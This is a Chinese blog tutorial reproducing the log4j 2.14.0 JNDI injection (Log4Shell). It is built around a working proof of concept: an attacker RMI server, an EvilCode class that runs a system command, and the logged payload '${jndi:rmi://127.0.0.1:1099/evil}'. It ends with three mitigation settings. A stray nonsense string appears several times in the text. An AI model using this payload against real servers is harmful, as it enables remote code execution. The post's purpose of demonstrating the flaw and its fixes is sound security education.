Java RMI引起的log4j漏洞问题重现

Java RMI引起的log4j漏洞问题重现

目录RMI和JNDIRMI模拟漏洞重现【紧急补救措施3选1】

2021-12-10日左右，java的log4j框架出现了一个大漏洞，对服务器案例引起了不小的影响，当然只对于log4j的日志使用者来说，如果你是spring框架，用的是logback，不存在这个问题。

RMI和JNDIRMI

（Remote Method Invocation） 即Java远程方法调用，一种用于实现远程过程调用的应用程序编程接口

JNDI (Java Naming and Directory Interface)是一个应用程序设计的API，为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接eCYSxnLPcR口

JNDI和RMI的主要关系是RMI注册的服务可以通过JNDIAPI访问。在讨论到Spring反序列化漏洞之前，先看看如果通过JNDI来调用RMI注册的服务。

模拟漏洞重现

pom依赖

org.springframework.boot

spring-boot-starter-web

org.springframework.boot

spring-boot-starter-logging

org.apache.logging.log4j

eCYSxnLPcR log4j-api

2.14.0

org.apache.logging.log4j

log4j-core

2.14.0

黑客端

/**

* 构建RMI服务来响应恶意代码

*

* Java RMI，即 远程方法调用（Remote Method Invocation），一种用于实现远程过程调用(RPC)的Java API， 能直接传输序列化后的Java对象和分布式垃圾收集。它的实现依赖于(JVM)，因此它仅支持从一个JVM到另一个JVM的调用。

*/

public class RMIServer {

@SneakyThrows

public static void main(String... args) {

try {

// 本地主机上的远程对象注册表Registry的实例,默认端口1099

LocateRegistry.createRegistry(1099);

Registry registry = LocateRegistry.getRegistry();

System.out.println("Create RMI registry on port 1099");

//返回的Java对象

Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);

ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

// 把远程对象注册到RMI注册服务器上，并命名为evil

registry.bind("evil", referenceWrapper);

} catch (RemoteException | AlreadyBoundException | NamingException e) {

e.printStackTrace();

}

}

/**

* 执行任意的脚本，目前的脚本会使windows服务器打开计算器.

*/

public class EvilCode {

static {

System.out.println("受害服务器将执行下面命令行");

Process p;

String[] cmd = {"calc"};

try {

p = Runtime.getRuntime().exec(cmd);

InputStream fis = p.getInputStream();

InputStreamReader isr = new InputStreamReader(fis);

BufferedReader br = new BufferedReader(isr);

String line = null;

while ((line = br.readLine()) != null) {

System.out.println(line);

}

} catch (IOException e) {

e.printStackTrace();

}

}

}

网站端

public class Server {

private static final Logger logger = LogManager.getLogger();

public static void main(String[] args) {

String name = "${java:runtime}";

logger.info("name:{}", name);

//模拟填写数据,输入构造好的字符串,使受害服务器打印日志时执行远程的代码 同一台可以使用127.0.0.1

String username = "${jndi:rmi://127.0.0.1:1099/evil}";

//正常打印业务日志

logger.error("username:{}", username);

}

}

【紧急补救措施3选1】

修改 JVM 参数 -Dlog4j2.formatMsgNoLookups=true

修改配置 log4j2.formatMsgNoLookups=True

将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

eCYSxnLPcR

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。